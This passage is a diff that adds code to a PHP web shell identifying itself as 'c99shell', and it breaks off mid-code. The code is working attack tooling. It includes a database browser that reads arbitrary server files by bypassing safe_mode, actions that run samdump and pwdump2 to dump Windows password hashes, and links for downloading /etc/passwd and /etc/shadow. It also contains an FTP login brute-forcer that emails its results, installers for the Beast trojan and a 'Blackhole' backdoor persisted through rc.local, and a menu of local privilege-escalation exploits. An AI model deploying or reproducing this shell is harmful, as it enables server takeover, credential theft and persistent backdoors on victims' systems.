+       fwrite($fp,$ret); 
+       fclose($fp); 
+       echo "<b>Dumped! Dump has been writed to \"".htmlspecialchars(realpath($sql_dump_file))."\" (".view_size(filesize($sql_dump_file)).")</b>."; 
+      } 
+     } 
+     else {echo "<b>Dump: nothing to do!</b>";} 
+    } 
+   } 
+   if ($diplay) 
+   { 
+    if (!empty($sql_tbl)) 
+    { 
+     if (empty($sql_tbl_act)) {$sql_tbl_act = "browse";} 
+     $count = mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`;"); 
+     $count_row = mysql_fetch_array($count); 
+     mysql_free_result($count); 
+     $tbl_struct_result = mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;"); 
+     $tbl_struct_fields = array(); 
+     while ($row = mysql_fetch_assoc($tbl_struct_result)) {$tbl_struct_fields[] = $row;} 
+     if ($sql_ls > $sql_le) {$sql_le = $sql_ls + $perpage;} 
+     if (empty($sql_tbl_page)) {$sql_tbl_page = 0;} 
+     if (empty($sql_tbl_ls)) {$sql_tbl_ls = 0;} 
+     if (empty($sql_tbl_le)) {$sql_tbl_le = 30;} 
+     $perpage = $sql_tbl_le - $sql_tbl_ls; 
+     if (!is_numeric($perpage)) {$perpage = 10;} 
+     $numpages = $count_row[0]/$perpage; 
+     $e = explode(" ",$sql_order); 
+     if (count($e) == 2) 
+     { 
+      if ($e[0] == "d") {$asc_desc = "DESC";} 
+      else {$asc_desc = "ASC";} 
+      $v = "ORDER BY `".$e[1]."` ".$asc_desc." "; 
+     } 
+     else {$v = "";} 
+     $query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage.""; 
+     $result = mysql_query($query) or print(mysql_smarterror()); 
+     echo "<hr size=\"1\" noshade><center><b>Table ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." cols and ".$count_row[0]." rows)</b></center>"; 
+     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=structure\">[&nbsp;<b>Structure</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;"; 
+     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=browse\">[&nbsp;<b>Browse</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;"; 
+     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_act=tbldump&thistbl=1\">[&nbsp;<b>Dump</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;"; 
+     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=insert\">[&nbsp;<b>Insert</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;"; 
+     if ($sql_tbl_act == "structure") {echo "<br><br><b>Coming sooon!</b>";} 
+     if ($sql_tbl_act == "insert") 
+     { 
+      if (!is_array($sql_tbl_insert)) {$sql_tbl_insert = array();} 
+      if (!empty($sql_tbl_insert_radio)) 
+      { 
+
+      } 
+      else 
+      { 
+       echo "<br><br><b>Inserting row into table:</b><br>"; 
+       if (!empty($sql_tbl_insert_q)) 
+       { 
+        $sql_query = "SELECT * FROM `".$sql_tbl."`"; 
+        $sql_query .= " WHERE".$sql_tbl_insert_q; 
+        $sql_query .= " LIMIT 1;"; 
+        $result = mysql_query($sql_query,$sql_sock) or print("<br><br>".mysql_smarterror()); 
+        $values = mysql_fetch_assoc($result); 
+        mysql_free_result($result); 
+       } 
+       else {$values = array();} 
+       echo "<form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgcolor=#000000 borderColorLight=#c0c0c0 border=1><tr><td><b>Field</b></td><td><b>Type</b></td><td><b>Function</b></td><td><b>Value</b></td></tr>"; 
+       foreach ($tbl_struct_fields as $field) 
+       { 
+        $name = $field["Field"]; 
+        if (empty($sql_tbl_insert_q)) {$v = "";} 
+        echo "<tr><td><b>".htmlspecialchars($name)."</b></td><td>".$field["Type"]."</td><td><select name=\"sql_tbl_insert_functs[".htmlspecialchars($name)."]\"><option value=\"\"></option><option>PASSWORD</option><option>MD5</option><option>ENCRYPT</option><option>ASCII</option><option>CHAR</option><option>RAND</option><option>LAST_INSERT_ID</option><option>COUNT</option><option>AVG</option><option>SUM</option><option value=\"\">--------</option><option>SOUNDEX</option><option>LCASE</option><option>UCASE</option><option>NOW</option><option>CURDATE</option><option>CURTIME</option><option>FROM_DAYS</option><option>FROM_UNIXTIME</option><option>PERIOD_ADD</option><option>PERIOD_DIFF</option><option>TO_DAYS</option><option>UNIX_TIMESTAMP</option><option>USER</option><option>WEEKDAY</option><option>CONCAT</option></select></td><td><input type=\"text\" name=\"sql_tbl_insert[".htmlspecialchars($name)."]\" value=\"".htmlspecialchars($values[$name])."\" size=50></td></tr>"; 
+        $i++; 
+       } 
+       echo "</table><br>"; 
+       echo "<input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"1\""; if (empty($sql_tbl_insert_q)) {echo " checked";} echo "><b>Insert as new row</b>"; 
+       if (!empty($sql_tbl_insert_q)) {echo " or <input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"2\" checked><b>Save</b>"; echo "<input type=\"hidden\" name=\"sql_tbl_insert_q\" value=\"".htmlspecialchars($sql_tbl_insert_q)."\">";} 
+       echo "<br><br><input type=\"submit\" value=\"Confirm\"></form>"; 
+      } 
+     } 
+     if ($sql_tbl_act == "browse") 
+     { 
+      $sql_tbl_ls = abs($sql_tbl_ls); 
+      $sql_tbl_le = abs($sql_tbl_le); 
+      echo "<hr size=\"1\" noshade>"; 
+      echo "<img src=\"".$surl."act=img&img=multipage\" height=\"12\" width=\"10\" alt=\"Pages\">&nbsp;"; 
+      $b = 0; 
+      for($i=0;$i<$numpages;$i++) 
+      { 
+       if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_order=".htmlspecialchars($sql_order)."&sql_tbl_ls=".($i*$perpage)."&sql_tbl_le=".($i*$perpage+$perpage)."\"><u>";} 
+       echo $i; 
+       if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "</u></a>";} 
+       if (($i/30 == round($i/30)) and ($i > 0)) {echo "<br>";} 
+       else {echo "&nbsp;";} 
+      } 
+      if ($i == 0) {echo "empty";} 
+      echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"sql_order\" value=\"".htmlspecialchars($sql_order)."\"><b>From:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_ls\" value=\"".$sql_tbl_ls."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_le\" value=\"".$sql_tbl_le."\">&nbsp;<input type=\"submit\" value=\"View\"></form>"; 
+      echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgcolor=#000000 borderColorLight=#c0c0c0 border=1>"; 
+      echo "<tr>"; 
+      echo "<td><input type=\"checkbox\" name=\"boxrow_all\" value=\"1\"></td>"; 
+      for ($i=0;$i<mysql_num_fields($result);$i++) 
+      { 
+       $v = mysql_field_name($result,$i); 
+       if ($e[0] == "a") {$s = "d"; $m = "asc";} 
+       else {$s = "a"; $m = "desc";} 
+       echo "<td>"; 
+       if (empty($e[0])) {$e[0] = "a";} 
+       if ($e[1] != $v) {echo "<a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$e[0]."%20".$v."\"><b>".$v."</b></a>";} 
+       else {echo "<b>".$v."</b><a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$s."%20".$v."\"><img src=\"".$surl."act=img&img=sort_".$m."\" height=\"9\" width=\"14\" alt=\"".$m."\"></a>";} 
+       echo "</td>"; 
+      } 
+      echo "<td><font color=\"green\"><b>Action</b></font></td>"; 
+      echo "</tr>"; 
+      while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) 
+      { 
+       echo "<tr>"; 
+       $w = ""; 
+       $i = 0; 
+       foreach ($row as $k=>$v) {$name = mysql_field_name($result,$i); $w .= " `".$name."` = '".addslashes($v)."' AND"; $i++;} 
+       if (count($row) > 0) {$w = substr($w,0,strlen($w)-3);} 
+       echo "<td><input type=\"checkbox\" name=\"boxrow[]\" value=\"".$w."\"></td>"; 
+       $i = 0; 
+       foreach ($row as $k=>$v) 
+       { 
+        $v = htmlspecialchars($v); 
+        if ($v == "") {$v = "<font color=\"green\">NULL</font>";} 
+        echo "<td>".$v."</td>"; 
+        $i++; 
+       } 
+       echo "<td>"; 
+       echo "<a href=\"".$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_query=".urlencode("DELETE FROM `".$sql_tbl."` WHERE".$w." LIMIT 1;")."\"><img src=\"".$surl."act=img&img=sql_button_drop\" alt=\"Delete\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;"; 
+       echo "<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_insert_q=".urlencode($w)."\"><img src=\"".$surl."act=img&img=change\" alt=\"Edit\" height=\"14\" width=\"14\" border=\"0\"></a>&nbsp;"; 
+       echo "</td>"; 
+       echo "</tr>"; 
+      } 
+      mysql_free_result($result); 
+      echo "</table><hr size=\"1\" noshade><p align=\"left\"><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\"><select name=\"sql_act\">"; 
+      echo "<option value=\"\">With selected:</option>"; 
+      echo "<option value=\"deleterow\">Delete</option>"; 
+      echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>"; 
+     } 
+    } 
+    else 
+    { 
+     $result = mysql_query("SHOW TABLE STATUS", $sql_sock); 
+     if (!$result) {echo mysql_smarterror();} 
+     else 
+     { 
+      echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgcolor=#000000 borderColorLight=#c0c0c0 border=1><tr><td><input type=\"checkbox\" name=\"boxtbl_all\" value=\"1\"></td><td><center><b>Table</b></center></td><td><b>Rows</b></td><td><b>Type</b></td><td><b>Created</b></td><td><b>Modified</b></td><td><b>Size</b></td><td><b>Action</b></td></tr>"; 
+      $i = 0; 
+      $tsize = $trows = 0; 
+      while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) 
+      { 
+       $tsize += $row["Data_length"]; 
+       $trows += $row["Rows"]; 
+       $size = view_size($row["Data_length"]); 
+       echo "<tr>"; 
+       echo "<td><input type=\"checkbox\" name=\"boxtbl[]\" value=\"".$row["Name"]."\"></td>"; 
+       echo "<td>&nbsp;<a href=\"".$sql_surl."sql_tbl=".urlencode($row["Name"])."\"><b>".$row["Name"]."</b></a>&nbsp;</td>"; 
+       echo "<td>".$row["Rows"]."</td>"; 
+       echo "<td>".$row["Type"]."</td>"; 
+       echo "<td>".$row["Create_time"]."</td>"; 
+       echo "<td>".$row["Update_time"]."</td>"; 
+       echo "<td>".$size."</td>"; 
+       echo "<td>&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DELETE FROM `".$row["Name"]."`")."\"><img src=\"".$surl."act=img&img=sql_button_empty\" alt=\"Empty\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DROP TABLE `".$row["Name"]."`")."\"><img src=\"".$surl."act=img&img=sql_button_drop\" alt=\"Drop\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".$row["Name"]."\"><img src=\"".$surl."act=img&img=sql_button_insert\" alt=\"Insert\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;</td>"; 
+       echo "</tr>"; 
+       $i++; 
+      } 
+      echo "<tr bgcolor=\"000000\">"; 
+      echo "<td><center><b>+</b></center></td>"; 
+      echo "<td><center><b>".$i." table(s)</b></center></td>"; 
+      echo "<td><b>".$trows."</b></td>"; 
+      echo "<td>".$row[1]."</td>"; 
+      echo "<td>".$row[10]."</td>"; 
+      echo "<td>".$row[11]."</td>"; 
+      echo "<td><b>".view_size($tsize)."</b></td>"; 
+      echo "<td></td>"; 
+      echo "</tr>"; 
+      echo "</table><hr size=\"1\" noshade><p align=\"right\"><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\"><select name=\"sql_act\">"; 
+      echo "<option value=\"\">With selected:</option>"; 
+      echo "<option value=\"tbldrop\">Drop</option>"; 
+      echo "<option value=\"tblempty\">Empty</option>"; 
+      echo "<option value=\"tbldump\">Dump</option>"; 
+      echo "<option value=\"tblcheck\">Check table</option>"; 
+      echo "<option value=\"tbloptimize\">Optimize table</option>"; 
+      echo "<option value=\"tblrepair\">Repair table</option>"; 
+      echo "<option value=\"tblanalyze\">Analyze table</option>"; 
+      echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>"; 
+      mysql_free_result($result); 
+     } 
+    } 
+   } 
+   } 
+  } 
+  else 
+  { 
+   $acts = array("","newdb","serverstatus","servervars","processes","getfile"); 
+   if (in_array($sql_act,$acts)) {?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newdb"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newdb" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>View File:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="getfile"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_getfile" size="30" value="<?php echo htmlspecialchars($sql_getfile); ?>">&nbsp;<input type="submit" value="Get"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php } 
+   if (!empty($sql_act)) 
+   { 
+    echo "<hr size=\"1\" noshade>"; 
+    if ($sql_act == "newdb") 
+    { 
+     echo "<b>"; 
+     if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";} 
+     else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();} 
+    } 
+    if ($sql_act == "serverstatus") 
+    { 
+     $result = mysql_query("SHOW STATUS", $sql_sock); 
+     echo "<center><b>Server-status variables:</b><br><br>"; 
+     echo "<TABLE cellSpacing=0 cellPadding=0 bgcolor=#000000 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>"; 
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";} 
+     echo "</table></center>"; 
+     mysql_free_result($result); 
+    } 
+    if ($sql_act == "servervars") 
+    { 
+     $result = mysql_query("SHOW VARIABLES", $sql_sock); 
+     echo "<center><b>Server variables:</b><br><br>"; 
+     echo "<TABLE cellSpacing=0 cellPadding=0 bgcolor=#000000 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>"; 
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";} 
+     echo "</table>"; 
+     mysql_free_result($result); 
+    } 
+    if ($sql_act == "processes") 
+    { 
+     if (!empty($kill)) {$query = "KILL ".$kill.";"; $result = mysql_query($query, $sql_sock); echo "<b>Killing process #".$kill."... ok. he is dead, amen.</b>";} 
+     $result = mysql_query("SHOW PROCESSLIST", $sql_sock); 
+     echo "<center><b>Processes:</b><br><br>"; 
+     echo "<TABLE cellSpacing=0 cellPadding=2 bgcolor=#000000 borderColorLight=#333333 border=1><td><b>ID</b></td><td><b>USER</b></td><td><b>HOST</b></td><td><b>DB</b></td><td><b>COMMAND</b></td><td><b>TIME</b></td><td><b>STATE</b></td><td><b>INFO</b></td><td><b>Action</b></td></tr>"; 
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td><td>".$row[2]."</td><td>".$row[3]."</td><td>".$row[4]."</td><td>".$row[5]."</td><td>".$row[6]."</td><td>".$row[7]."</td><td><a href=\"".$sql_surl."sql_act=processes&kill=".$row[0]."\"><u>Kill</u></a></td></tr>";} 
+     echo "</table>"; 
+     mysql_free_result($result); 
+    } 
+    if ($sql_act == "getfile") 
+    { 
+     $tmpdb = $sql_login."_tmpdb"; 
+     $select = mysql_select_db($tmpdb); 
+     if (!$select) {mysql_create_db($tmpdb); $select = mysql_select_db($tmpdb); $created = !!$select;} 
+     if ($select) 
+     { 
+      $created = FALSE; 
+      mysql_query("CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );"); 
+      mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file"); 
+      $result = mysql_query("SELECT * FROM tmp_file;"); 
+      if (!$result) {echo "<b>Error in reading file (permision denied)!</b>";} 
+      else 
+      { 
+       for ($i=0;$i<mysql_num_fields($result);$i++) {$name = mysql_field_name($result,$i);} 
+       $f = ""; 
+       while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {$f .= join ("\r\n",$row);} 
+       if (empty($f)) {echo "<b>File \"".$sql_getfile."\" does not exists or empty!</b><br>";} 
+       else {echo "<b>File \"".$sql_getfile."\":</b><br>".nl2br(htmlspecialchars($f))."<br>";} 
+       mysql_free_result($result); 
+       mysql_query("DROP TABLE tmp_file;"); 
+      } 
+     } 
+     mysql_drop_db($tmpdb); //comment it if you want to leave database 
+    } 
+   } 
+  } 
+ } 
+ echo "</td></tr></table>"; 
+ if ($sql_sock) 
+ { 
+  $affected = @mysql_affected_rows($sql_sock); 
+  if ((!is_numeric($affected)) or ($affected < 0)){$affected = 0;} 
+  echo "<tr><td><center><b>Affected rows: ".$affected."</center></td></tr>"; 
+ } 
+ echo "</table>"; 
+}
+if ($act == 'grablogins') {
+	if ($win) {
+		echo '<b>Grab Windows Logins:</b><br><br>';
+		if (file_exists($_SERVER['WINDIR'])) {
+			echo 'Download backup SAM file: <a href="'.$surl.'act=f&f=sam&ft=download&d='.$_SERVER["WINDIR"].'\repair\"><b>'.$_SERVER['WINDIR'].'\repair\SAM</b></a><br><br>';
+		} else {
+			echo 'There\'s no backup SAM file!';
+		}
+		echo '<a href="'.$surl.'act=grablogins&dumphashes=samdump"><b>Execute SAMDUMP</b></a><br><br>';
+		if ($_GET['dumphashes'] == 'samdump') {
+			if (is_writable('.')) {
+				cf('samdump.exe', $samdump);
+				exec('samdump.exe '.$_SERVER['WINDIR'].'\repair\sam', $blah);
+				echo '<textarea cols=175 rows=10>';
+				foreach ($blah as $samline)
+					echo htmlentities($samline)."\n";
+				echo '</textarea><br><br>';
+				if (file_exists('samdump.exe'))
+					unlink('samdump.exe');
+			}else{
+				echo 'Directory Is Not Writable!<br>';
+			}
+		} // end if samdump was called
+		echo '<a href="'.$surl.'act=grablogins&dumphashes=pwdump2"><b>Execute PWDUMP2</b></a><br><br>';
+		if ($_GET['dumphashes'] == 'pwdump2') {
+			if (is_writable('.')) {
+				cf('pwdump2.exe', $pwdump2);
+				cf('samdump.dll', $samdumpdll);
+				exec('pwdump2.exe', $blah);
+				echo '<textarea cols=175 rows=10>';
+				if ($blah) {
+					foreach ($blah as $samline)
+						echo htmlentities($samline)."\n";
+				} else {
+					echo 'Couldn\'t get hashes!';
+				}
+				echo '</textarea><br><br>';
+				if (file_exists('pwdump2.exe'))
+					unlink('pwdump2.exe');
+				if (file_exists('samdump.dll'))
+					unlink('samdump.dll');
+			}else{
+				echo 'Directory Is Not Writable!<br>';
+			}
+		} // end if pwdump2 was called
+
+	} else { // if not windows
+		echo '<b>Grab *nix Logins:</b><br><br>';
+		if (file_exists('/etc/passwd'))
+			echo 'Download passwd: <a href="'.$surl.'act=f&f=passwd&ft=download&d=/etc/"><b>/etc/passwd</b>';
+		if (file_exists('/etc/master.passwd'))
+			echo 'Download master.passwd: <a href="'.$surl.'act=f&f=master.passwd&ft=download&d=/etc/"><b>/etc/master.passwd</b> <- 1% chance you can view this';
+		if (file_exists('/etc/shadow'))
+			echo 'Download shadow: <a href="'.$surl.'act=f&f=shadow&ft=download&d=/etc/"><b>/etc/shadow</b> <- 1% chance you can view this';
+	}
+}
+if ($act == "mkdir") 
+{ 
+ if ($mkdir != $d) 
+ { 
+  if (file_exists($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: object alredy exists";} 
+  elseif (!mkdir($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: access denied";} 
+  echo "<br><br>"; 
+ } 
+ $act = $dspact = "ls"; 
+} 
+if ($act == "ftpquickbrute") 
+{ 
+ echo "<b>Ftp Quick brute:</b><br>"; 
+ if (!win) {echo "This function does not work in Windows!<br><br>";} 
+ else 
+ { 
+  function c99ftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh) 
+  { 
+   if ($fqb_onlywithsh) {$TRUE = (!in_array($sh,array("/bin/FALSE","/sbin/nologin")));} 
+   else {$TRUE = TRUE;} 
+   if ($TRUE) 
+   { 
+    $sock = @ftp_connect($host,$port,$timeout); 
+    if (@ftp_login($sock,$login,$pass)) 
+    { 
+     echo "<a href=\"ftp://".$login.":".$pass."@".$host."\" target=\"_blank\"><b>Connected to ".$host." with login \"".$login."\" and password \"".$pass."\"</b></a>.<br>"; 
+     ob_flush(); 
+     return TRUE; 
+    } 
+   } 
+  } 
+  if (!empty($submit)) 
+  { 
+   if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;} 
+   $fp = fopen("/etc/passwd","r"); 
+   if (!$fp) {echo "Can't get /etc/passwd for password-list.";} 
+   else 
+   { 
+    if ($fqb_logging) 
+    { 
+     if ($fqb_logfile) {$fqb_logfp = fopen($fqb_logfile,"w");} 
+     else {$fqb_logfp = FALSE;} 
+     $fqb_log = "FTP Quick Brute (called c99shell v. ".$shver.") started at ".date("d.m.Y H:i:s")."\r\n\r\n"; 
+     if ($fqb_logfile) {fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} 
+    } 
+    ob_flush(); 
+    $i = $success = 0; 
+    $ftpquick_st = getmicrotime(); 
+    while(!feof($fp)) 
+    { 
+     $str = explode(":",fgets($fp,2048)); 
+     if (c99ftpbrutecheck("localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh)) 
+     { 
+      echo "<b>Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\"</b><br>"; 
+      $fqb_log .= "Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\", at ".date("d.m.Y H:i:s")."\r\n"; 
+      if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} 
+      $success++; 
+      ob_flush(); 
+     } 
+     if ($i > $fqb_lenght) {break;} 
+     $i++; 
+    } 
+    if ($success == 0) {echo "No success. connections!"; $fqb_log .= "No success. connections!\r\n";} 
+    $ftpquick_t = round(getmicrotime()-$ftpquick_st,4); 
+    echo "<hr size=\"1\" noshade><b>Done!</b><br>Total time (secs.): ".$ftpquick_t."<br>Total connections: ".$i."<br>Success.: <font color=green><b>".$success."</b></font><br>Unsuccess.:".($i-$success)."</b><br>Connects per second: ".round($i/$ftpquick_t,2)."<br>"; 
+    $fqb_log .= "\r\n------------------------------------------\r\nDone!\r\nTotal time (secs.): ".$ftpquick_t."\r\nTotal connections: ".$i."\r\nSuccess.: ".$success."\r\nUnsuccess.:".($i-$success)."\r\nConnects per second: ".round($i/$ftpquick_t,2)."\r\n"; 
+    if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} 
+    if ($fqb_logemail) {@mail($fqb_logemail,"c99shell v. ".$shver." report",$fqb_log);} 
+    fclose($fqb_logfp); 
+   } 
+  } 
+  else 
+  { 
+   $logfile = $tmpdir_logs."c99sh_ftpquickbrute_".date("d.m.Y_H_i_s").".log"; 
+   $logfile = str_replace("//",DIRECTORY_SEPARATOR,$logfile); 
+   echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"ftpquickbrute\"><br>Read first: <input type=text name=\"fqb_lenght\" value=\"".$nixpwdperpage."\"><br><br>Users only with shell?&nbsp;<input type=\"checkbox\" name=\"fqb_onlywithsh\" value=\"1\"><br><br>Logging?&nbsp;<input type=\"checkbox\" name=\"fqb_logging\" value=\"1\" checked><br>Logging to file?&nbsp;<input type=\"text\" name=\"fqb_logfile\" value=\"".$logfile."\" size=\"".(strlen($logfile)+2*(strlen($logfile)/10))."\"><br>Logging to e-mail?&nbsp;<input type=\"text\" name=\"fqb_logemail\" value=\"".$log_email."\" size=\"".(strlen($logemail)+2*(strlen($logemail)/10))."\"><br><br><input type=submit name=submit value=\"Brute\"></form>"; 
+  } 
+ } 
+} 
+if ($act == 'd')
+{ 
+ if (!is_dir($d)) {echo "<center><b>Permision denied!</b></center>";} 
+ else 
+ { 
+  echo "<b>Directory information:</b><table border=0 cellspacing=1 cellpadding=2>"; 
+  if (!$win) 
+  { 
+   echo "<tr><td><b>Owner/Group</b></td><td> "; 
+   $ow = posix_getpwuid(fileowner($d)); 
+   $gr = posix_getgrgid(filegroup($d)); 
+   $row[] = ($ow["name"]?$ow["name"]:fileowner($d))."/".($gr["name"]?$gr["name"]:filegroup($d)); 
+  } 
+  echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&d=".urlencode($d)."\"><b>".view_perms_color($d)."</b></a><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d))."</td></tr></table><br>"; 
+ } 
+} 
+if ($act == 'phpinfo') {@ob_clean(); phpinfo(); c99shexit();} 
+
+if ($act == 'trojan') {
+echo '<b>Install Trojan Server:</b><br><br>';
+	if ($win) {
+		echo 'Please keep in mind that these are <u>not</u> undetectable trojans.  Any decent anti-virus will pick them up, and they take no action to bypass firewalls or routers.  Use at your own risk.<br><br>';
+?>
+<form action="<?php echo $surl; ?>" method=GET>
+Choose Trojan: <select name="choosetrojan">
+<option value="beast">Beast v2.07</option>
+</select>
+<input type=hidden name="act" value="trojan">
+<input type=submit value="Install Server">
+</form>
+<?php
+		$choosetrojan = $_GET['choosetrojan'];
+		if ($choosetrojan == 'beast') {
+			if (is_writable('.')) {
+				cf('server.exe', $beast);
+				exec('server.exe');
+				echo 'Beast trojan server is running on port 6666 with no password.<br>';
+			}else{
+				echo 'Directory Is Not Writable!<br>';
+			}
+		} // end if beast was called
+} else { // if not windows
+?>
+<b>Install Backdoor:</b><br><br>
+<form action="<?php echo $surl; ?>" method=GET>
+Choose Backdoor: <select name="choosebackdoor">
+<option value="blackhole">Blackhole</option>
+</select>
+<input type=hidden name="act" value="trojan">
+<input type=submit value="Install Server">
+</form>
+<?php
+		$choosebackdoor = $_GET['choosebackdoor'];
+		if ($choosebackdoor == 'blackhole') {
+			if (is_writable('.')) {
+				cf('apache', $blackhole);
+				echo 'Blackhole is _not_ running.  Go to the shell and run it yourself.  Here\'s the example from the readme:<br><pre>   # ./backhole &
+   i.e. # mv backhole /some/path/fakemail
+        # chmod 4770 /path/to/fakemail
+        # echo "/path/to/fakemail &" >> /etc/rc.d/rc.local
+        # /path/to/fakemail &</pre>Blackhole is configured to run under the process name \'apache\' on port 6875.<br>';
+			}else{
+				echo 'Directory Is Not Writable!<br>';
+			}
+		} // end if beast was called
+
+
+	} // end if windows/unix
+} // end if trojan was called
+
+if ($act == 'exploits') {
+?>
+<b>Exploits:</b>
+<br><br>
+All exploits are pre-compiled.  Just follow the directions.
+<br><br>
+<a href="<?php echo $surl; ?>act=exploits&sploit=h00lyshit">h00lyshit - Local Race Exploit</a>
+<?php
+		if ($_GET['sploit'] == 'h00lyshit') {
+			if (is_writable('.')) {
